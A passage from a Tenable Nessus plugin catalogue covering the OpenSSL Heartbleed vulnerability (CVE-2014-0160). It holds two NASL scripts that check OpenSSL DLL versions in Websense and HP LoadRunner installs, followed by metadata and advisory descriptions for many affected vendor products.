445); exit(0); } include("audit.inc"); include("smb_func.inc"); include("smb_hotfixes.inc"); include("smb_hotfixes_fcheck.inc"); include("smb_reg_query.inc"); include("misc_func.inc"); function get_file_list(dir, pattern, max_depth) { local_var retx, file_list, dir_list, r_file_list, r_dir; if(max_depth < 0) return NULL; retx = FindFirstFile(pattern:dir + "\*"); file_list = make_list(); dir_list = make_list(); while(!isnull(retx[1])) { if(retx[2] & FILE_ATTRIBUTE_DIRECTORY && retx[1] != '.' && retx[1] != '..') dir_list = make_list(dir_list, retx[1]); else { if(retx[1] =~ pattern) file_list = make_list(file_list, dir + "\" + retx[1]); } retx = FindNextFile(handle:retx); } foreach r_dir (dir_list) { r_file_list = get_file_list(dir:dir + "\" + r_dir, pattern: pattern, max_depth: max_depth - 1); if(r_file_list != NULL) file_list = make_list(file_list, r_file_list); } return file_list; } path = get_kb_item_or_exit('SMB/Websense Email Security/Path'); version = get_kb_item_or_exit('SMB/Websense Email Security/Version'); # Per vendor : # Any build number greater than 7.3.1181 is vuln # No need to check earlier versions for the DLL if (ver_compare(ver:version, fix:"7.3.1181", strict:FALSE) < 0) audit(AUDIT_INST_PATH_NOT_VULN, 'Websense Email Security', version, path); name = kb_smb_name(); port = kb_smb_transport(); login = kb_smb_login(); pass = kb_smb_password(); domain = kb_smb_domain(); registry_init(); share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path); rc = NetUseAdd(login:login, password:pass, domain:domain, share:share); if (rc != 1) { NetUseDel(); audit(AUDIT_SHARE_FAIL, share); } # Find OpenSSL DLLs under main install path search_dir = ereg_replace(pattern:'[A-Za-z]:(.*)', replace:'\\1', string:path); dlls = get_file_list(dir:search_dir, pattern:"^(libeay32|ssleay32)\.dll$", max_depth:3); info = ""; foreach dll (dlls) { temp_path = (share - '$')+ ":" + dll; dll_ver = hotfix_get_pversion(path:temp_path); err_res = hotfix_handle_error( error_code : dll_ver['error'], file : temp_path, appname : 'Websense Email Security', exit_on_fail : FALSE ); if (err_res) continue; dll_version = join(dll_ver['value'], sep:"."); if (dll_version =~ "^1\.0\.1[a-f]$") info += '\n Path : ' + temp_path + '\n Installed version : ' + dll_version + '\n Fixed version : 1.0.1g\n'; } hotfix_check_fversion_end(); if (info) { if (report_verbosity > 0) security_warning(port:port, extra:info); else security_warning(port); } else audit(AUDIT_INST_PATH_NOT_VULN, 'Websense Email Security', version, path);NASL family Windows NASL id HP_LOADRUNNER_12_00_1.NASL description The version of HP LoadRunner installed on the remote host is 11.52.x prior to 11.52 Patch 2 or 12.00.x prior to 12.00 Patch 1. It is, therefore, affected by an out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 77054 published 2014-08-07 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/77054 title HP LoadRunner 11.52.x < 11.52 Patch 2 / 12.00.x < 12.00 Patch 1 Heartbeat Information Disclosure (Heartbleed) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(77054); script_version("1.14"); script_cvs_date("Date: 2019/11/25"); script_cve_id("CVE-2014-0160"); script_bugtraq_id(66690); script_xref(name:"CERT", value:"720951"); script_xref(name:"EDB-ID", value:"32745"); script_xref(name:"EDB-ID", value:"32764"); script_xref(name:"EDB-ID", value:"32791"); script_xref(name:"EDB-ID", value:"32998"); script_xref(name:"HP", value:"HPSBMU03040"); script_xref(name:"HP", value:"SSRT101565"); script_name(english:"HP LoadRunner 11.52.x < 11.52 Patch 2 / 12.00.x < 12.00 Patch 1 Heartbeat Information Disclosure (Heartbleed)"); script_summary(english:"Checks the version of HP LoadRunner."); script_set_attribute(attribute:"synopsis", value: "The remote Windows host has an application that is affected by an information disclosure vulnerability."); script_set_attribute(attribute:"description", value: "The version of HP LoadRunner installed on the remote host is 11.52.x prior to 11.52 Patch 2 or 12.00.x prior to 12.00 Patch 1. It is, therefore, affected by an out-of-bounds read error, known as the 'Heartbleed Bug' in the included OpenSSL version. This error is related to handling TLS heartbeat extensions that could allow an attacker to obtain sensitive information such as primary key material, secondary key material, and other protected content."); # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c04286049 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c3b43466"); script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/532104/30/0/threaded"); script_set_attribute(attribute:"see_also", value:"http://www.heartbleed.com"); script_set_attribute(attribute:"see_also", value:"https://eprint.iacr.org/2014/140"); script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/vulnerabilities.html#2014-0160"); script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/secadv/20140407.txt"); script_set_attribute(attribute:"solution", value: "Upgrade to HP LoadRunner 11.52 Patch 2 / 12.00 Patch 1 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-0160"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"in_the_news", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2014/02/24"); script_set_attribute(attribute:"patch_publication_date", value:"2014/05/14"); script_set_attribute(attribute:"plugin_publication_date", value:"2014/08/07"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:loadrunner"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Windows"); script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("hp_loadrunner_installed.nasl"); script_require_keys("SMB/Registry/Enumerated", "installed_sw/HP LoadRunner"); script_require_ports(139, 445); exit(0); } include('audit.inc'); include('smb_func.inc'); include('smb_hotfixes.inc'); include('smb_hotfixes_fcheck.inc'); include('smb_reg_query.inc'); include('misc_func.inc'); include("install_func.inc"); app_name = "HP LoadRunner"; cutoff = NULL; cutoff2 = NULL; fixed = NULL; report = NULL; # Only 1 install of the server is possible. install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE); version = install['version']; path = install['path']; verui = install['display_version']; # Determine cutoff if affected branch. # 11.52.0 is 11.52.1323.0 or 11.52.1517.0 # 12.00.0 is 12.00.661.0 if (version =~ "^11\.52($|[^0-9])") { cutoff = "11.52.1323.0"; cutoff2 = "11.52.1517.0"; } if (version =~ "^12\.00?($|[^0-9])") { cutoff = "12.0.661.0"; cutoff2 = "12.0.661.0"; } if (isnull(cutoff)) audit(AUDIT_NOT_INST, app_name + " 11.52.x / 12.0.x"); if (version >= cutoff && version <= cutoff2) { foreach file (make_list("ssleay32_101_x32.dll", "ssleay32_101_x64.dll")) { dll_path = path + "bin\" + file; res = hotfix_get_fversion(path:dll_path); err_res = hotfix_handle_error( error_code : res['error'], file : dll_path, appname : app_name, exit_on_fail : FALSE ); if (err_res) continue; dll_ver = join(sep:'.', res['value']); break; } hotfix_check_fversion_end(); if (empty_or_null(dll_ver)) audit( AUDIT_VER_FAIL, "ssleay32_101_x32.dll and ssleay32_101_x64.dll under " + path + "bin\" ); fixed_dll_ver = '1.0.1.4'; if (ver_compare(ver:dll_ver, fix:fixed_dll_ver, strict:FALSE) == -1) report = '\n Path : ' + dll_path + '\n Installed DLL version : ' + dll_ver + '\n Fixed DLL version : ' + fixed_dll_ver + '\n'; } # If not at a patchable version, use ver_compare() and suggest # upgrade if needed; do not use cutoff2 - this will lead to # false positives. else if ( ( cutoff =~ "^11\." && ver_compare(ver:"11.52", fix:version, strict:FALSE) >= 0 && ver_compare(ver:version, fix:cutoff, strict:FALSE) == -1 ) || ( cutoff =~ "^12\." && ver_compare(ver:"12.00", fix:version, strict:FALSE) >= 0 && ver_compare(ver:version, fix:cutoff, strict:FALSE) == -1 ) ) { report = '\n Path : ' + path + '\n Installed version : ' + version + '\n Fixed version : 11.52.1323.0 (11.52 Patch 2) / 12.0.661.0 (12.00 Patch 1)' + '\n'; } if (isnull(report)) audit(AUDIT_INST_PATH_NOT_VULN, app_name, verui, path); port = kb_smb_transport(); if (report_verbosity > 0) security_warning(extra:report, port:port); else security_warning(port);NASL family Misc. NASL id VMWARE_VMSA-2014-0004_REMOTE.NASL description The remote VMware ESXi host is affected by multiple vulnerabilities in the OpenSSL third-party library : - A flaw exist in the Elliptic Curve Digital Signature Algorithm (ECDSA) implementation due to a failure to insure that certain swap operations have a constant-time behavior. An attacker can exploit this to obtain the ECDSA nonces by using a FLUSH+RELOAD cache side-channel attack. (CVE-2014-0076) - An out-of-bounds read error, known as Heartbleed, exists in the TLS/DTLS implementation due to improper handling of TLS heartbeat extension packets. A remote attacker, using crafted packets, can trigger a buffer over-read, resulting in the disclosure of up to 64KB of process memory, which contains sensitive information such as primary key material, secondary key material, and other protected content. (CVE-2014-0160) last seen 2020-06-01 modified 2020-06-02 plugin id 87676 published 2015-12-30 reporter This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/87676 title VMware ESXi Multiple OpenSSL Vulnerabilities (VMSA-2014-0004) (Heartbleed) NASL family Scientific Linux Local Security Checks NASL id SL_20140408_OPENSSL_ON_SL6_X.NASL description An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted. last seen 2020-06-01 modified 2020-06-02 plugin id 73408 published 2014-04-08 reporter This script is Copyright (C) 2014 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73408 title Scientific Linux Security Update : openssl on SL6.x i386/x86_64 NASL family Windows NASL id SMB_KB2962393.NASL description The remote host is missing KB2962393, which resolves an OpenSSL information disclosure vulnerability (Heartbleed) in the Juniper VPN client software shipped with Windows 8.1. last seen 2020-06-01 modified 2020-06-02 plugin id 73865 published 2014-05-05 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73865 title MS KB2962393: Update for Vulnerability in Juniper Networks Windows In-Box Junos Pulse Client (Heartbleed) NASL family Fedora Local Security Checks NASL id FEDORA_2014-4910.NASL description pull in upstream patch for CVE-2014-0160 last seen 2020-03-17 modified 2014-04-09 plugin id 73430 published 2014-04-09 reporter This script is Copyright (C) 2014-2020 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73430 title Fedora 19 : openssl-1.0.1e-37.fc19.1 (2014-4910) NASL family Windows NASL id HP_INSIGHT_CONTROL_SERVER_MIGRATION_7_3_2.NASL description According to its version, the HP Insight Control Server Migration install on the remote Windows host includes a bundled copy of OpenSSL that is affected by an information disclosure vulnerability. A remote attacker could read the contents of up to 64KB of server memory, potentially exposing passwords, private keys, and other sensitive data. last seen 2020-06-01 modified 2020-06-02 plugin id 76463 published 2014-07-10 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/76463 title HP Insight Control Server Migration 7.3.0 and 7.3.1 OpenSSL Heartbeat Information Disclosure (Heartbleed) NASL family Windows NASL id VMWARE_WORKSTATION_MULTIPLE_VMSA_2014_0004.NASL description The version of VMware Workstation installed on the remote host is version 10.x prior to 10.0.2. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the last seen 2020-06-01 modified 2020-06-02 plugin id 73674 published 2014-04-21 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73674 title VMware Workstation 10.x < 10.0.2 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Heartbleed) NASL family MacOS X Local Security Checks NASL id MACOSX_LIBREOFFICE_423.NASL description A version of LibreOffice 4.2.x prior to 4.2.3 is installed on the remote Mac OS X host. This version of LibreOffice is bundled with a version of OpenSSL affected by multiple vulnerabilities : - An error exists in the function last seen 2020-06-01 modified 2020-06-02 plugin id 76511 published 2014-07-15 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/76511 title LibreOffice 4.2.x < 4.2.3 OpenSSL Multiple Vulnerabilities (Mac OS X) (Heartbleed) NASL family Misc. NASL id FORTINET_FG-IR-14-011.NASL description The firmware of the remote Fortinet host is running a version of OpenSSL that is affected by a remote information disclosure, commonly known as the last seen 2020-06-01 modified 2020-06-02 plugin id 73669 published 2014-04-11 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73669 title Fortinet OpenSSL Information Disclosure (Heartbleed) NASL family Windows NASL id STUNNEL_5_01.NASL description The version of stunnel installed on the remote host is prior to version 5.01. It is, therefore, affected by an information disclosure vulnerability in the bundled OpenSSL DLLs. A remote attacker can read the contents of up to 64KB of server memory, potentially exposing passwords, private keys, and other sensitive data. Note that Nessus has not tested for this issue but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 73500 published 2014-04-14 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73500 title stunnel < 5.01 OpenSSL Heartbeat Information Disclosure (Heartbleed) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2014-0376.NASL description Updated openssl packages that fix one security issue are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. All OpenSSL users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted. last seen 2020-06-01 modified 2020-06-02 plugin id 73396 published 2014-04-08 reporter This script is Copyright (C) 2014-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73396 title RHEL 6 : openssl (RHSA-2014:0376) NASL family Windows NASL id ATTACHMATE_REFLECTION_HEARTBLEED.NASL description The Attachmate Reflection install on the remote host is affected by an out-of-bounds read error known as the last seen 2020-06-01 modified 2020-06-02 plugin id 76309 published 2014-06-30 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/76309 title Attachmate Reflection Heartbeat Information Disclosure (Heartbleed) NASL family Firewalls NASL id MCAFEE_FIREWALL_ENTERPRISE_SB10071.NASL description The remote host has a version of McAfee Firewall Enterprise installed that is affected by an out-of-bounds read error, known as Heartbleed, in the TLS/DTLS implementation due to improper handling of TLS heartbeat extension packets. A remote attacker, using crafted packets, can trigger a buffer over-read, resulting in the disclosure of up to 64KB of process memory, which contains sensitive information such as primary key material, secondary key material, and other protected content. last seen 2020-06-01 modified 2020-06-02 plugin id 73834 published 2014-05-02 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73834 title McAfee Firewall Enterprise OpenSSL Information Disclosure (SB10071) (Heartbleed) NASL family SuSE Local Security Checks NASL id OPENSUSE-2014-277.NASL description This openssl update fixes one security issue : - bnc#872299: Fixed missing bounds checks for heartbeat messages (CVE-2014-0160). last seen 2020-06-05 modified 2014-06-13 plugin id 75314 published 2014-06-13 reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/75314 title openSUSE Security Update : openssl (openSUSE-SU-2014:0492-1) (Heartbleed) NASL family Windows NASL id FILEZILLA_SERVER_0944.NASL description According to its banner, the version of FileZilla Server running on the remote host is prior to 0.9.44. It is, therefore, affected by an information disclosure vulnerability. An information disclosure flaw exists with the OpenSSL included with FileZilla Server. A remote attacker could read the contents of up to 64KB of server memory, potentially exposing passwords, private keys, and other sensitive data. Note that Nessus has not tested for this issue but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 73640 published 2014-04-21 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73640 title FileZilla Server < 0.9.44 OpenSSL Heartbeat Information Disclosure (Heartbleed) NASL family MacOS X Local Security Checks NASL id MACOSX_FUSION_6_0_3.NASL description The version of VMware Fusion 6.x installed on the remote Mac OS X host is prior to 6.0.3. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the last seen 2020-06-01 modified 2020-06-02 plugin id 73670 published 2014-04-21 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73670 title VMware Fusion 6.x < 6.0.3 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Heartbleed) NASL family Windows NASL id SYMANTEC_ENDPOINT_PROT_MGR_12_1_RU4_MP1A.NASL description According to its self-reported version number, the version of Symantec Endpoint Protection Manager (SEPM) installed on the remote host is affected by an out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 73964 published 2014-05-12 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73964 title Symantec Endpoint Protection Manager < 12.1 RU4 MP1a OpenSSL Heartbeat Information Disclosure (Heartbleed) NASL family Web Servers NASL id HP_OFFICEJET_PRO_HEARTBLEED.NASL description According to its self-reported build information, the firmware running on the remote HP OfficeJet printer is affected by an out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 74270 published 2014-06-02 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/74270 title HP OfficeJet Printer Heartbeat Information Disclosure (Heartbleed) NASL family Fedora Local Security Checks NASL id FEDORA_2014-9308.NASL description Multiple moderate issues fixed. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-03-17 modified 2014-08-10 plugin id 77108 published 2014-08-10 reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/77108 title Fedora 20 : openssl-1.0.1e-39.fc20 (2014-9308) (Heartbleed) NASL family VMware ESX Local Security Checks NASL id VMWARE_VMSA-2014-0004.NASL description a. Information Disclosure vulnerability in OpenSSL third-party library The OpenSSL library is updated to version openssl-1.0.1g to resolve multiple security issues. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2014-0076 and CVE-2014-0160 to these issues. CVE-2014-0160 is known as the Heartbleed issue. More information on this issue may be found in the reference section. To remediate the issue for products that have updated versions or patches available, perform these steps: * Deploy the VMware product update or product patches * Replace certificates per the product-specific documentation * Reset passwords per the product-specific documentation Section 4 lists product-specific references to installation instructions and certificate management documentation. last seen 2020-06-01 modified 2020-06-02 plugin id 73851 published 2014-05-03 reporter This script is Copyright (C) 2014-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73851 title VMSA-2014-0004 : VMware product updates address OpenSSL security vulnerabilities NASL family Web Servers NASL id HPSMH_7_3_2.NASL description According to the web server last seen 2020-06-01 modified 2020-06-02 plugin id 73639 published 2014-04-18 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73639 title HP System Management Homepage OpenSSL Multiple Vulnerabilities (Heartbleed) NASL family Slackware Local Security Checks NASL id SLACKWARE_SSA_2014-098-01.NASL description New openssl packages are available for Slackware 14.0, 14.1, and -current to fix security issues. last seen 2020-06-01 modified 2020-06-02 plugin id 73409 published 2014-04-08 reporter This script is Copyright (C) 2014 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73409 title Slackware 14.0 / 14.1 / current : openssl (SSA:2014-098-01) NASL family F5 Networks Local Security Checks NASL id F5_BIGIP_SOL15159.NASL description The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug. (CVE-2014-0160) Impact A malicious user can exploit vulnerable systems and retrieve information from memory. This information may potentially include user credentials or the private keys used for Transport Layer Security (TLS) or Datagram Transport Layer Security (DTLS). For information about vulnerable components or features, refer to the following list : Virtual servers using aSecure Sockets Layer (SSL) profile configured with the default Native SSL ciphers are not vulnerable. Only virtual servers using an SSL profile configured to use ciphers from the COMPAT SSL stack are vulnerable in BIG-IP 11.5.0 and 11.5.1. Additionally, virtual servers that do not use SSL profiles and pass SSL traffic to the back-end web servers will not protect the back-end resource servers. The Configuration utility and other services, such as iControl, are vulnerable. The big3d process included with BIG-IP GTM 11.5.0 and 11.5.1 is vulnerable. Additionally, monitored BIG-IP systems whose big3d process was updated by an affected BIG-IP GTM system are also vulnerable. The big3d process included with Enterprise Manager 3.1.1 HF1 and HF2 is vulnerable. Additionally, monitored BIG-IP systems whose big3d process was updated by an affected Enterprise Manager system are also vulnerable. The BIG-IP Edge Client for Android is not vulnerable. However, the BIG-IP Edge Client for Windows, Mac OS, and Linux is vulnerable. An attacker can retrieve sensitive information by using the stated vulnerability in the following scenarios: User is tricked into connecting to any malicious SSL server. User connects to a compromised FirePass or BIG-IP APM system. last seen 2020-06-01 modified 2020-06-02 plugin id 78164 published 2014-10-10 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/78164 title F5 Networks BIG-IP : OpenSSL vulnerability (K15159) (Heartbleed) NASL family AIX Local Security Checks NASL id AIX_OPENSSL_ADVISORY7.NASL description The version of OpenSSL running on the remote host is affected by an information disclosure vulnerability. OpenSSL incorrectly handles memory in the TLS heartbeat extension, potentially allowing a remote attacker to read the contents of up to 64KB of server memory, potentially exposing passwords, private keys, and other sensitive data. last seen 2020-06-01 modified 2020-06-02 plugin id 73472 published 2014-04-11 reporter This script is Copyright (C) 2014-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73472 title AIX OpenSSL Advisory : openssl_advisory7.doc (Heartbleed) NASL family Misc. NASL id MCAFEE_EMAIL_GATEWAY_SB10071.NASL description The remote host is running a version of McAfee Email Gateway (MEG) that is affected by an information disclosure due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device. last seen 2020-06-01 modified 2020-06-02 plugin id 73832 published 2014-05-02 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73832 title McAfee Email Gateway OpenSSL Information Disclosure (SB10071) (Heartbleed) NASL family Web Servers NASL id SPLUNK_603.NASL description According to its version number, the Splunk Web hosted on the remote web server is 6.x prior to 6.0.3. It is, therefore, affected by multiple OpenSSL-related vulnerabilities : - A flaw exists with the OpenSSL version being used by Splunk with the last seen 2020-06-01 modified 2020-06-02 plugin id 73575 published 2014-04-16 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73575 title Splunk 6.x < 6.0.3 Multiple OpenSSL Vulnerabilities (Heartbleed) NASL family Windows NASL id WINSCP_5_5_3.NASL description The WinSCP program installed on the remote host is version 4.x later than 4.3.7, 5.x later than 5.0.6 and prior to 5.5.3. It is, therefore, affected by the following vulnerabilities : - An out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 73613 published 2014-04-18 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73613 title WinSCP Heartbeat Information Disclosure (Heartbleed) NASL family General NASL id VMWARE_WORKSTATION_LINUX_10_0_2.NASL description The installed version of VMware Workstation 10.x is prior to 10.0.2. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the last seen 2020-06-01 modified 2020-06-02 plugin id 73673 published 2014-04-21 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73673 title VMware Workstation 10.x < 10.0.2 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Linux) (Heartbleed) NASL family Windows NASL id BLACKBERRY_ES_UDS_KB35882.NASL description The BlackBerry Enterprise Service (BES) install on the remote host is affected by an out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 73762 published 2014-04-29 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73762 title BlackBerry Enterprise Service Information Disclosure (KB35882) (Heartbleed) NASL family CentOS Local Security Checks NASL id CENTOS_RHSA-2014-0376.NASL description Updated openssl packages that fix one security issue are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. All OpenSSL users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted. last seen 2020-06-01 modified 2020-06-02 plugin id 73387 published 2014-04-08 reporter This script is Copyright (C) 2014 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73387 title CentOS 6 : openssl (CESA-2014:0376) NASL family Misc. NASL id KERIO_CONNECT_824.NASL description According to its banner, the remote host is running a version of Kerio Connect (formerly Kerio MailServer) version 8.2.x prior to 8.2.4. It is, therefore, affected by an out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 76402 published 2014-07-08 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/76402 title Kerio Connect 8.2.x < 8.2.4 Heartbeat Information Disclosure (Heartbleed) NASL family Fedora Local Security Checks NASL id FEDORA_2014-4999.NASL description Fixes CVE-2014-0160 (RHBZ #1085066) Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-03-17 modified 2014-04-16 plugin id 73547 published 2014-04-16 reporter This script is Copyright (C) 2014-2020 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73547 title Fedora 19 : mingw-openssl-1.0.1e-6.fc19 (2014-4999) (Heartbleed) NASL family FreeBSD Local Security Checks NASL id FREEBSD_PKG_5631AE98BE9E11E3B5E3C80AA9043978.NASL description OpenSSL Reports : A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server. Affected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS. The bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop communications, steal data directly from the services and users and to impersonate services and users. The code used to handle the Heartbeat Extension does not do sufficient boundary checks on record length, which allows reading beyond the actual payload. last seen 2020-06-01 modified 2020-06-02 plugin id 73389 published 2014-04-08 reporter This script is Copyright (C) 2014 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73389 title FreeBSD : OpenSSL -- Remote Information Disclosure (5631ae98-be9e-11e3-b5e3-c80aa9043978) NASL family Fedora Local Security Checks NASL id FEDORA_2014-4982.NASL description Fixes CVE-2014-0160 (RHBZ #1085066) Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-03-17 modified 2014-04-15 plugin id 73509 published 2014-04-15 reporter This script is Copyright (C) 2014-2020 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73509 title Fedora 20 : mingw-openssl-1.0.1e-6.fc20 (2014-4982) (Heartbleed) NASL family 